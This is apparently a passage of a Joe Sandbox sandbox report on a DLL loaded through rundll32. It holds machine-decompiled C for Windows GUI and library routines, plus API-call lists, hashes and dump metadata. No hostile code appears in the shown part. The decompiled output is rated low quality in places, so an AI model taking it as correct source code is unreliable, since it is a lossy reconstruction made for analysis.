				} else {
					__imp__CLSIDFromString();
				}
				_push(_t183);
				_push( *((intOrPtr*)(_t239 + 0x20)));
				_push(_t229);
				 *(_t239 + 0x1c) = _t143;
				E1002EC6C(_t239 - 0x94, _t256);
				 *(_t239 - 4) = 2;
				 *(_t239 - 0x24) = _t183;
				asm("sbb esi, esi");
				_t233 =  ~( *((intOrPtr*)(_t239 + 0x18)) - 0x378) & _t239 - 0x00000094;
				if( *(_t239 + 0x1c) >= _t183 && E100090DE( *((intOrPtr*)(_t239 + 8))) != 0 && E10009A9F( *((intOrPtr*)( *((intOrPtr*)(_t239 + 8)) + 0x48)), _t183, _t239 - 0x20, _t183,  *_t225, _t239 - 0x68,  *(_t225 + 0x10) & 0x0000ffff, _t233, 0 |  *((short*)(_t239 + 0x18)) == 0x00000377,  *(_t239 - 0x28), _t239 - 0x24) != 0) {
					E1000A762( *(_t239 - 0x24), 1);
					SetWindowPos( *( *(_t239 - 0x24) + 0x20),  *(_t239 + 0xc), _t183, _t183, _t183, _t183, 0x13);
					 *( *(_t239 - 0x24) + 0x90) =  *(_t239 - 0x2c);
					E100074A5(_t183,  *(_t239 - 0x24) + 0xa0, _t239, _t239 + 0x14);
					 *((short*)( *(_t239 - 0x24) + 0x94)) =  *(_t239 - 0x38);
					 *( *(_t239 - 0x24) + 0x98) =  *(_t239 - 0x3c);
					 *( *(_t239 - 0x24) + 0x9c) =  *(_t239 - 0x30);
				}
				if( *(_t239 - 0x28) != _t183) {
					__imp__#6( *(_t239 - 0x28));
				}
				_t146 =  *(_t239 - 0x24);
				if(_t146 == _t183) {
					 *( *(_t239 + 0x24)) = _t183;
				} else {
					 *( *(_t239 + 0x24)) =  *(_t146 + 0x20);
					_t183 = 1;
				}
				 *(_t239 - 4) = 0;
				E1002EFD7(_t183, _t239 - 0x94, _t218);
				E100014B0( *((intOrPtr*)(_t239 + 0x14)) + 0xfffffff0, _t218);
				 *[fs:0x0] =  *((intOrPtr*)(_t239 - 0xc));
				return E100117AE(_t183,  *((intOrPtr*)(_t239 - 0x10)));
			}






























                                                                        0x100074f2
                                                                        0x100074f7
                                                                        0x10007502
                                                                        0x10007509
                                                                        0x1000750c
                                                                        0x1000750f
                                                                        0x10007514
                                                                        0x10007517
                                                                        0x1000751a
                                                                        0x10007522
                                                                        0x10007528
                                                                        0x1000752f
                                                                        0x10007539
                                                                        0x10007541
                                                                        0x10007549
                                                                        0x1000754c
                                                                        0x10007550
                                                                        0x10007554
                                                                        0x10007557
                                                                        0x10007557
                                                                        0x1000755a
                                                                        0x10007568
                                                                        0x10007569
                                                                        0x1000756d
                                                                        0x1000757c
                                                                        0x1000757f
                                                                        0x10007582
                                                                        0x10007585
                                                                        0x1000758f
                                                                        0x10007592
                                                                        0x10007595
                                                                        0x10007597
                                                                        0x10007599
                                                                        0x1000759d
                                                                        0x100075a2
                                                                        0x100075a6
                                                                        0x100075ac
                                                                        0x100075ae
                                                                        0x100075b0
                                                                        0x100075b3
                                                                        0x100075b3
                                                                        0x100075b6
                                                                        0x100075b6
                                                                        0x100075b8
                                                                        0x100075bb
                                                                        0x100075c0
                                                                        0x100075ca
                                                                        0x100075d3
                                                                        0x100075d6
                                                                        0x100075d9
                                                                        0x100075dc
                                                                        0x100075df
                                                                        0x100075ed
                                                                        0x100075ef
                                                                        0x100075ef
                                                                        0x100075f2
                                                                        0x100075f7
                                                                        0x100075fa
                                                                        0x100075fd
                                                                        0x10007603
                                                                        0x10007603
                                                                        0x10007605
                                                                        0x10007609
                                                                        0x10007610
                                                                        0x10007616
                                                                        0x10007619
                                                                        0x1000761d
                                                                        0x10007654
                                                                        0x1000765a
                                                                        0x1000765d
                                                                        0x1000765f
                                                                        0x10007663
                                                                        0x10007677
                                                                        0x10007677
                                                                        0x10007665
                                                                        0x10007670
                                                                        0x10007670
                                                                        0x10007679
                                                                        0x1000767d
                                                                        0x1000761f
                                                                        0x10007621
                                                                        0x10007624
                                                                        0x10007629
                                                                        0x10007630
                                                                        0x10007633
                                                                        0x1000763b
                                                                        0x10007640
                                                                        0x10007643
                                                                        0x10007646
                                                                        0x1000764d
                                                                        0x1000764d
                                                                        0x10007680
                                                                        0x10007689
                                                                        0x10007689
                                                                        0x1000768c
                                                                        0x1000768f
                                                                        0x1000768f
                                                                        0x10007696
                                                                        0x10007699
                                                                        0x100076a0
                                                                        0x100076a1
                                                                        0x100076a2
                                                                        0x100076ac
                                                                        0x100076a4
                                                                        0x100076a4
                                                                        0x100076a4
                                                                        0x100076b2
                                                                        0x100076b3
                                                                        0x100076bc
                                                                        0x100076bd
                                                                        0x100076c0
                                                                        0x100076d7
                                                                        0x100076db
                                                                        0x100076de
                                                                        0x100076e0
                                                                        0x100076e5
                                                                        0x10007734
                                                                        0x10007748
                                                                        0x10007754
                                                                        0x10007767
                                                                        0x10007773
                                                                        0x10007780
                                                                        0x1000778c
                                                                        0x1000778c
                                                                        0x10007796
                                                                        0x1000779b
                                                                        0x1000779b
                                                                        0x100077a1
                                                                        0x100077a6
                                                                        0x100077b8
                                                                        0x100077a8
                                                                        0x100077b0
                                                                        0x100077b2
                                                                        0x100077b2
                                                                        0x100077c0
                                                                        0x100077c4
                                                                        0x100077cf
                                                                        0x100077d8
                                                                        0x100077eb

                                                                        APIs
                                                                        • __EH_prolog.LIBCMT ref: 100074F7
                                                                        • MapDialogRect.USER32(?,?), ref: 10007585
                                                                        • SysAllocStringLen.OLEAUT32(?,00000000), ref: 100075A6
                                                                        • CLSIDFromString.OLE32(?,00000004), ref: 100076A4
                                                                        • CLSIDFromProgID.OLE32(?,00000004), ref: 100076AC
                                                                        • SetWindowPos.USER32(00000004,?,00000000,00000000,00000000,00000000,00000013,00000001,00000000,00000004,00000000,?,?,?,0000FC84,00000000), ref: 10007748
                                                                        • SysFreeString.OLEAUT32(?), ref: 1000779B
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: String$From$AllocDialogFreeH_prologProgRectWindow
                                                                        • String ID:
                                                                        • API String ID: 493809305-0
                                                                        • Opcode ID: 49f95f9342accb2b989199e6a3fe790c04b9925ae12edf67e65d2fb5adebfaa9
                                                                        • Instruction ID: 430f13df2ed8550076e5f7c2e9f31eb497c55eb67174fe5e7936e43fbe5827de
                                                                        • Opcode Fuzzy Hash: 49f95f9342accb2b989199e6a3fe790c04b9925ae12edf67e65d2fb5adebfaa9
                                                                        • Instruction Fuzzy Hash: F5A12475D00619DFDB04CFA8C884AEDBBF4FF08344F118529E819AB251E735AE90CBA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1002DA8D Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 174COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 29%
                                                                        			E1002DA8D(intOrPtr __ecx, void* __edx) {
				void* __esi;
				void* __ebp;
				intOrPtr _t60;
				signed char _t65;
				signed int _t70;
				signed int _t71;
				intOrPtr _t109;
				signed int _t115;
				signed int _t117;
				void* _t133;
				void* _t135;
				intOrPtr _t140;
				void* _t143;
				void* _t145;

				_t133 = __edx;
				_t143 = _t145 - 0xa8;
				_t60 =  *0x1004c470; // 0x1bfbe703
				_t140 =  *((intOrPtr*)(_t143 + 0xb0));
				 *((intOrPtr*)(_t143 + 0xa4)) = _t60;
				_t109 = __ecx;
				_t62 = GetWindowRect( *(_t140 + 0x1c), _t143 - 0x80);
				if( *((intOrPtr*)(_t140 + 0x88)) != _t109 ||  *(_t143 + 0xb4) != 0 && EqualRect(_t143 - 0x80,  *(_t143 + 0xb4)) == 0) {
					if( *((intOrPtr*)(_t109 + 0x90)) != 0 && ( *(_t140 + 0x80) & 0x00000040) != 0) {
						 *(_t109 + 0x7c) =  *(_t109 + 0x7c) | 0x00000040;
					}
					 *(_t109 + 0x7c) =  *(_t109 + 0x7c) & 0xfffffff9;
					_t65 =  *(_t140 + 0x7c) & 0x00000006 |  *(_t109 + 0x7c);
					 *(_t109 + 0x7c) = _t65;
					if((_t65 & 0x00000040) == 0) {
						_push(0x104);
						_push(_t143 - 0x60);
						E1002095F(_t140);
						E10029B23(_t140,  *((intOrPtr*)(_t109 + 0x1c)), _t143 - 0x60);
					}
					_t70 = ( *(_t140 + 0x7c) ^  *(_t109 + 0x7c)) & 0x0000f000 ^  *(_t140 + 0x7c) | 0x00000f00;
					if( *((intOrPtr*)(_t109 + 0x90)) == 0) {
						_t71 = _t70 & 0xfffffffe;
					} else {
						_t71 = _t70 | 0x00000001;
					}
					E100383D0(_t140, _t71);
					_push(0xffffffff);
					_t135 = E1002CDCE(_t109, GetDlgCtrlID( *(_t140 + 0x1c)) & 0x0000ffff);
					if(_t135 > 0) {
						 *((intOrPtr*)(E100086F2(_t109 + 0x94, _t135))) = _t140;
					}
					if( *(_t143 + 0xb4) == 0) {
						if(_t135 < 1) {
							_t137 = _t109 + 0x94;
							E1001E2BE(_t109 + 0x94, _t143,  *((intOrPtr*)(_t109 + 0x9c)), _t140);
							E1001E2BE(_t137, _t143,  *((intOrPtr*)(_t137 + 8)), 0);
						}
						_t115 =  *0x1004efa4; // 0x2
						_push(0x115);
						_push(0);
						_push(0);
						_push( ~_t115);
						_t117 =  *0x1004efa0; // 0x2
						_push( ~_t117);
						_push(0);
					} else {
						CopyRect(_t143 - 0x70,  *(_t143 + 0xb4));
						E10028E5A(_t109, _t143 - 0x70);
						if(_t135 < 1) {
							asm("cdq");
							asm("cdq");
							_push(( *((intOrPtr*)(_t143 - 0x64)) -  *((intOrPtr*)(_t143 - 0x6c)) - _t133 >> 1) +  *((intOrPtr*)(_t143 - 0x6c)));
							_push(( *((intOrPtr*)(_t143 - 0x68)) -  *(_t143 - 0x70) - _t133 >> 1) +  *(_t143 - 0x70));
							_push( *((intOrPtr*)(_t143 + 0xb0)));
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
							E1002CE2A(_t109);
							_t140 =  *((intOrPtr*)(_t143 + 0xb0));
						}
						_push(0x114);
						_push( *((intOrPtr*)(_t143 - 0x64)) -  *((intOrPtr*)(_t143 - 0x6c)));
						_push( *((intOrPtr*)(_t143 - 0x68)) -  *(_t143 - 0x70));
						_push( *((intOrPtr*)(_t143 - 0x6c)));
						_push( *(_t143 - 0x70));
						_push(0);
					}
					E100204FE(_t140);
					if(E100220EE(_t143, GetParent( *(_t140 + 0x1c))) != _t109) {
						E1000870E(_t140, _t109);
					}
					_t120 =  *((intOrPtr*)(_t140 + 0x88));
					if( *((intOrPtr*)(_t140 + 0x88)) != 0) {
						E1002D1B2(_t120, _t140, 0xffffffff, 0);
					}
					 *((intOrPtr*)(_t140 + 0x88)) = _t109;
					 *(E100314D8(_t109) + 0xcc) =  *(_t62 + 0xcc) | 0x0000000c;
				}
				return E100117AE(_t62,  *((intOrPtr*)(_t143 + 0xa4)));
			}

















                                                                        0x1002da8d
                                                                        0x1002da8e
                                                                        0x1002da9b
                                                                        0x1002daa2
                                                                        0x1002daa8
                                                                        0x1002dab6
                                                                        0x1002dab8
                                                                        0x1002dac4
                                                                        0x1002daf2
                                                                        0x1002dafd
                                                                        0x1002dafd
                                                                        0x1002db01
                                                                        0x1002db0e
                                                                        0x1002db12
                                                                        0x1002db15
                                                                        0x1002db17
                                                                        0x1002db1f
                                                                        0x1002db22
                                                                        0x1002db2e
                                                                        0x1002db2e
                                                                        0x1002db41
                                                                        0x1002db4d
                                                                        0x1002db54
                                                                        0x1002db4f
                                                                        0x1002db4f
                                                                        0x1002db4f
                                                                        0x1002db5a
                                                                        0x1002db5f
                                                                        0x1002db75
                                                                        0x1002db79
                                                                        0x1002db87
                                                                        0x1002db87
                                                                        0x1002db90
                                                                        0x1002dc11
                                                                        0x1002dc13
                                                                        0x1002dc1f
                                                                        0x1002dc2b
                                                                        0x1002dc2b
                                                                        0x1002dc30
                                                                        0x1002dc36
                                                                        0x1002dc3d
                                                                        0x1002dc3e
                                                                        0x1002dc41
                                                                        0x1002dc42
                                                                        0x1002dc4a
                                                                        0x1002dc4b
                                                                        0x1002db92
                                                                        0x1002db9c
                                                                        0x1002dba8
                                                                        0x1002dbb0
                                                                        0x1002dbbb
                                                                        0x1002dbcb
                                                                        0x1002dbd3
                                                                        0x1002dbd4
                                                                        0x1002dbda
                                                                        0x1002dbe0
                                                                        0x1002dbe1
                                                                        0x1002dbe2
                                                                        0x1002dbe5
                                                                        0x1002dbe6
                                                                        0x1002dbeb
                                                                        0x1002dbeb
                                                                        0x1002dbf7
                                                                        0x1002dbfc
                                                                        0x1002dc03
                                                                        0x1002dc04
                                                                        0x1002dc07
                                                                        0x1002dc0a
                                                                        0x1002dc0a
                                                                        0x1002dc4e
                                                                        0x1002dc64
                                                                        0x1002dc69
                                                                        0x1002dc69
                                                                        0x1002dc6e
                                                                        0x1002dc76
                                                                        0x1002dc7d
                                                                        0x1002dc7d
                                                                        0x1002dc84
                                                                        0x1002dc8f
                                                                        0x1002dc8f
                                                                        0x1002dcab

                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Rect$CopyCtrlEqualParentWindow
                                                                        • String ID: @
                                                                        • API String ID: 2544134605-2766056989
                                                                        • Opcode ID: c20e828919207d0164ea6c25dc37f68ea2733143114ea03cae4a2a36553e5d5a
                                                                        • Instruction ID: b45b6ef3e14a7e4d87b63386d5d067ae84193d18a4a25c559dd4ceadf4ed8576
                                                                        • Opcode Fuzzy Hash: c20e828919207d0164ea6c25dc37f68ea2733143114ea03cae4a2a36553e5d5a
                                                                        • Instruction Fuzzy Hash: E651BA716006499FDF25DF68DC95BAE77AAFF44300F504529E91ADB1A2CB30AD05CB10
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10021B92 Relevance: 10.6, APIs: 7, Instructions: 115windowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 97%
                                                                        			E10021B92(intOrPtr* __ecx, signed int _a4) {
				struct HWND__* _v4;
				struct tagMSG* _v8;
				int _v12;
				int _v16;
				struct HWND__* _t42;
				signed int _t45;
				int _t53;
				long _t56;
				int _t62;
				intOrPtr* _t69;

				_t62 = 1;
				_t69 = __ecx;
				_v12 = 1;
				_v16 = 0;
				if((_a4 & 0x00000004) == 0 || (E100202AB(__ecx) & 0x10000000) != 0) {
					_t62 = 0;
				}
				_t42 = GetParent( *(_t69 + 0x1c));
				 *(_t69 + 0x38) =  *(_t69 + 0x38) | 0x00000018;
				_v4 = _t42;
				_v8 = E1001F7B7();
				L14:
				while(1) {
					L14:
					while(_v12 != 0) {
						if(PeekMessageA(_v8, 0, 0, 0, 0) != 0) {
							while(1) {
								L15:
								_t45 = E1001FABB();
								if(_t45 == 0) {
									break;
								}
								if(_t62 != 0) {
									_t53 = _v8->message;
									if(_t53 == 0x118 || _t53 == 0x104) {
										E100203AD(_t69, 1);
										UpdateWindow( *(_t69 + 0x1c));
										_t62 = 0;
									}
								}
								if( *((intOrPtr*)( *_t69 + 0x80))() == 0) {
									 *(_t69 + 0x38) =  *(_t69 + 0x38) & 0xffffffe7;
									return  *((intOrPtr*)(_t69 + 0x40));
								} else {
									if(E1001FA27(_v8) != 0) {
										_v12 = 1;
										_v16 = 0;
									}
									if(PeekMessageA(_v8, 0, 0, 0, 0) != 0) {
										continue;
									} else {
										goto L14;
									}
								}
							}
							_push(0);
							E1003A098();
							return _t45 | 0xffffffff;
						}
						if(_t62 != 0) {
							E100203AD(_t69, 1);
							UpdateWindow( *(_t69 + 0x1c));
							_t62 = 0;
						}
						if((_a4 & 0x00000001) == 0 && _v4 != 0 && _v16 == 0) {
							SendMessageA(_v4, 0x121, 0,  *(_t69 + 0x1c));
						}
						if((_a4 & 0x00000002) != 0) {
							L13:
							_v12 = 0;
							continue;
						} else {
							_t56 = SendMessageA( *(_t69 + 0x1c), 0x36a, 0, _v16);
							_v16 = _v16 + 1;
							if(_t56 != 0) {
								continue;
							}
							goto L13;
						}
					}
					goto L15;
				}
			}













                                                                        0x10021b9b
                                                                        0x10021ba3
                                                                        0x10021ba5
                                                                        0x10021ba9
                                                                        0x10021bad
                                                                        0x10021bbb
                                                                        0x10021bbb
                                                                        0x10021bc0
                                                                        0x10021bc6
                                                                        0x10021bca
                                                                        0x10021bd9
                                                                        0x00000000
                                                                        0x10021c51
                                                                        0x00000000
                                                                        0x10021c51
                                                                        0x10021bef
                                                                        0x10021c57
                                                                        0x10021c57
                                                                        0x10021c57
                                                                        0x10021c5e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10021c62
                                                                        0x10021c68
                                                                        0x10021c70
                                                                        0x10021c7d
                                                                        0x10021c85
                                                                        0x10021c87
                                                                        0x10021c87
                                                                        0x10021c70
                                                                        0x10021c95
                                                                        0x10021cd0
                                                                        0x00000000
                                                                        0x10021c97
                                                                        0x10021ca3
                                                                        0x10021ca5
                                                                        0x10021cad
                                                                        0x10021cad
                                                                        0x10021cc1
                                                                        0x00000000
                                                                        0x10021cc3
                                                                        0x00000000
                                                                        0x10021cc3
                                                                        0x10021cc1
                                                                        0x10021c95
                                                                        0x10021cc5
                                                                        0x10021cc6
                                                                        0x00000000
                                                                        0x10021ccb
                                                                        0x10021bf3
                                                                        0x10021bf9
                                                                        0x10021c01
                                                                        0x10021c03
                                                                        0x10021c03
                                                                        0x10021c0a
                                                                        0x10021c25
                                                                        0x10021c25
                                                                        0x10021c30
                                                                        0x10021c4d
                                                                        0x10021c4d
                                                                        0x00000000
                                                                        0x10021c32
                                                                        0x10021c3f
                                                                        0x10021c45
                                                                        0x10021c4b
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10021c4b
                                                                        0x10021c30
                                                                        0x00000000
                                                                        0x10021c51

                                                                        APIs
                                                                        • GetParent.USER32(?), ref: 10021BC0
                                                                        • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 10021BE7
                                                                        • UpdateWindow.USER32(?), ref: 10021C01
                                                                        • SendMessageA.USER32 ref: 10021C25
                                                                        • SendMessageA.USER32 ref: 10021C3F
                                                                        • UpdateWindow.USER32(?), ref: 10021C85
                                                                        • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 10021CB9
                                                                          • Part of subcall function 100202AB: GetWindowLongA.USER32 ref: 100202B6
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Message$Window$PeekSendUpdate$LongParent
                                                                        • String ID:
                                                                        • API String ID: 2853195852-0
                                                                        • Opcode ID: 5ee4d89bd6c594df32917749107b3ff340b5b4dd3c4e0b0819ec5134911ec0b1
                                                                        • Instruction ID: 572a0072a054787b928fb31f1bd515718dba8d5f307fe0ba771f0ec6dbe0ec5d
                                                                        • Opcode Fuzzy Hash: 5ee4d89bd6c594df32917749107b3ff340b5b4dd3c4e0b0819ec5134911ec0b1
                                                                        • Instruction Fuzzy Hash: AC41D4382047419FD722CF22AC88E5BBAF5FFD1794FA0092DF881951A1D732E945CB52
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1000943B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114comstringCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 78%
                                                                        			E1000943B(void* __ecx) {
				intOrPtr _t54;
				intOrPtr _t56;
				signed int _t72;
				signed int _t74;
				signed int _t79;
				void* _t81;
				void* _t85;
				void* _t100;
				void* _t101;
				void* _t103;
				signed int _t106;
				intOrPtr* _t107;
				void* _t109;
				void* _t111;
				void* _t112;

				E10011BF0(0x1003add7, _t109);
				_t112 = _t111 - 0x80;
				_t54 =  *0x1004c470; // 0x1bfbe703
				 *((intOrPtr*)(_t109 - 0x10)) = _t54;
				_t101 = __ecx;
				 *((intOrPtr*)(_t109 - 0x58)) =  *0x1004b0a0(_t100, _t103, _t85);
				 *((intOrPtr*)(_t109 - 0x50)) = 0;
				 *((intOrPtr*)(_t109 - 0x54)) = 0x10040430;
				_t56 =  *((intOrPtr*)(_t109 + 8));
				 *(_t109 - 4) = 0;
				if(_t56 == 0 ||  *(_t56 + 4) == 0) {
					if(E100090AB(_t109 - 0x54, 0x11) != 0 || E100090AB(_t109 - 0x54, 0xd) != 0) {
						_t56 = _t109 - 0x54;
						goto L6;
					} else {
						 *((intOrPtr*)(_t101 + 0x60)) = 0;
					}
				} else {
					L6:
					_t13 = _t56 + 4; // 0x10009a67
					GetObjectA( *_t13, 0x3c, _t109 - 0x4c);
					 *(_t109 - 0x78) = 0x20;
					_t105 = lstrlenA(_t109 - 0x30) + 1;
					E10010B20(lstrlenA(_t109 - 0x30) + 0x00000001 + lstrlenA(_t109 - 0x30) + 0x00000001 + 0x00000003 & 0xfffffffc, _t109 - 0x4c);
					 *((intOrPtr*)(_t109 - 0x74)) = E100067FA(_t112, _t109 - 0x30, _t105,  *((intOrPtr*)(_t109 - 0x58)));
					 *((short*)(_t109 - 0x68)) =  *((intOrPtr*)(_t109 - 0x3c));
					 *(_t109 - 0x66) =  *(_t109 - 0x35) & 0x000000ff;
					 *(_t109 - 0x64) =  *(_t109 - 0x38) & 0x000000ff;
					 *(_t109 - 0x60) =  *(_t109 - 0x37) & 0x000000ff;
					 *(_t109 - 0x5c) =  *(_t109 - 0x36) & 0x000000ff;
					_t72 =  *(_t109 - 0x4c);
					__eflags = _t72;
					_t106 = _t72;
					if(_t72 < 0) {
						_t106 =  ~_t72;
					}
					E10029194(_t109 - 0x8c);
					 *(_t109 - 4) = 1;
					_t74 = GetDeviceCaps( *(_t109 - 0x84), 0x5a);
					asm("cdq");
					_t107 = _t101 + 0x60;
					 *((intOrPtr*)(_t109 - 0x6c)) = 0;
					 *(_t109 - 0x70) = _t106 * 0xafc80 / _t74;
					E1003881B(_t107);
					_t79 = _t109 - 0x78;
					__imp__#420(_t79, 0x10043168, _t107,  *((intOrPtr*)(_t101 + 0x1c)));
					__eflags = _t79;
					if(__eflags < 0) {
						 *_t107 = 0;
					}
					 *(_t109 - 4) = 0;
					E100291EF(_t109 - 0x8c, __eflags);
				}
				 *(_t109 - 4) =  *(_t109 - 4) | 0xffffffff;
				 *((intOrPtr*)(_t109 - 0x54)) = 0x1003eb6c;
				_t81 = E100293B4(_t109 - 0x54);
				 *[fs:0x0] =  *((intOrPtr*)(_t109 - 0xc));
				return E100117AE(_t81,  *((intOrPtr*)(_t109 - 0x10)));
			}


















                                                                        0x10009440
                                                                        0x10009445
                                                                        0x1000944b
                                                                        0x10009453
                                                                        0x10009456
                                                                        0x10009460
                                                                        0x10009463
                                                                        0x10009466
                                                                        0x1000946d
                                                                        0x10009472
                                                                        0x10009475
                                                                        0x10009488
                                                                        0x100094a0
                                                                        0x00000000
                                                                        0x10009498
                                                                        0x10009498
                                                                        0x10009498
                                                                        0x100094a3
                                                                        0x100094a3
                                                                        0x100094a9
                                                                        0x100094ac
                                                                        0x100094b6
                                                                        0x100094c5
                                                                        0x100094cf
                                                                        0x100094e4
                                                                        0x100094eb
                                                                        0x100094f4
                                                                        0x100094fc
                                                                        0x10009503
                                                                        0x1000950a
                                                                        0x1000950d
                                                                        0x10009510
                                                                        0x10009512
                                                                        0x10009514
                                                                        0x10009518
                                                                        0x10009518
                                                                        0x10009523
                                                                        0x10009530
                                                                        0x10009534
                                                                        0x10009544
                                                                        0x10009547
                                                                        0x1000954b
                                                                        0x1000954e
                                                                        0x10009551
                                                                        0x1000955c
                                                                        0x10009560
                                                                        0x10009566
                                                                        0x10009568
                                                                        0x1000956a
                                                                        0x1000956a
                                                                        0x10009572
                                                                        0x10009575
                                                                        0x10009575
                                                                        0x1000957a
                                                                        0x10009581
                                                                        0x10009588
                                                                        0x10009596
                                                                        0x100095a9

                                                                        APIs
                                                                        • __EH_prolog.LIBCMT ref: 10009440
                                                                        • GetObjectA.GDI32(10009A67,0000003C,?), ref: 100094AC
                                                                        • lstrlenA.KERNEL32(?), ref: 100094BD
                                                                        • GetDeviceCaps.GDI32(?,0000005A), ref: 10009534
                                                                        • OleCreateFontIndirect.OLEAUT32(00000020,10043168,?), ref: 10009560
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: CapsCreateDeviceFontH_prologIndirectObjectlstrlen
                                                                        • String ID:
                                                                        • API String ID: 4082312370-3916222277
                                                                        • Opcode ID: c9eae7b3fc1a36e4ece0a6461cbd5fbb0f42655d26c805cc56fff76f0e8a2cce
                                                                        • Instruction ID: 94df4567bccff522b7d7bd0d545f1ce16673c33dc0c382d35917ea97f1dbbf88
                                                                        • Opcode Fuzzy Hash: c9eae7b3fc1a36e4ece0a6461cbd5fbb0f42655d26c805cc56fff76f0e8a2cce
                                                                        • Instruction Fuzzy Hash: C641BA75D01259AFEB10CFE5C885ADDBBB4FF09344F50802AE856EB292E7349A04CB50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10037732 Relevance: 10.6, APIs: 7, Instructions: 96memoryCOMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 97%
                                                                        			E10037732(long* __ecx, signed int _a4, intOrPtr _a8) {
				struct _CRITICAL_SECTION* _v8;
				void* __ebp;
				void* _t32;
				void* _t36;
				void* _t37;
				signed int _t52;
				long* _t59;
				struct _CRITICAL_SECTION* _t62;
				void* _t64;

				_push(__ecx);
				_t59 = __ecx;
				_t1 =  &(_t59[7]); // 0x1004f010
				_t62 = _t1;
				_v8 = _t62;
				EnterCriticalSection(_t62);
				_t32 = _a4;
				if(_t32 <= 0) {
					L20:
					LeaveCriticalSection(_t62);
				} else {
					_t4 =  &(_t59[3]); // 0x3
					if(_t32 >=  *_t4) {
						goto L20;
					} else {
						_t64 = TlsGetValue( *_t59);
						if(_t64 == 0) {
							if(E1003741E(0x10) == 0) {
								_t64 = 0;
							} else {
								_t64 = E10037684(_t34);
							}
							 *(_t64 + 8) = 0;
							 *(_t64 + 0xc) = 0;
							_t10 =  &(_t59[5]); // 0x3160d50
							_t49 =  *_t10;
							_t11 =  &(_t59[6]); // 0x4
							 *(_t64 +  *_t11) =  *_t10;
							_t59[5] = _t64;
							goto L10;
						} else {
							_t52 = _a4;
							if(_t52 >=  *(_t64 + 8) && _a8 != 0) {
								L10:
								_t36 =  *(_t64 + 0xc);
								if(_t36 != 0) {
									_t16 =  &(_t59[3]); // 0x3
									_t49 =  *_t16 << 2;
									_t37 = LocalReAlloc(_t36,  *_t16 << 2, 2);
								} else {
									_t15 =  &(_t59[3]); // 0x3
									_t37 = LocalAlloc(0,  *_t15 << 2);
								}
								if(_t37 == 0) {
									LeaveCriticalSection(_v8);
									_t37 = E1001CE3B(_t49);
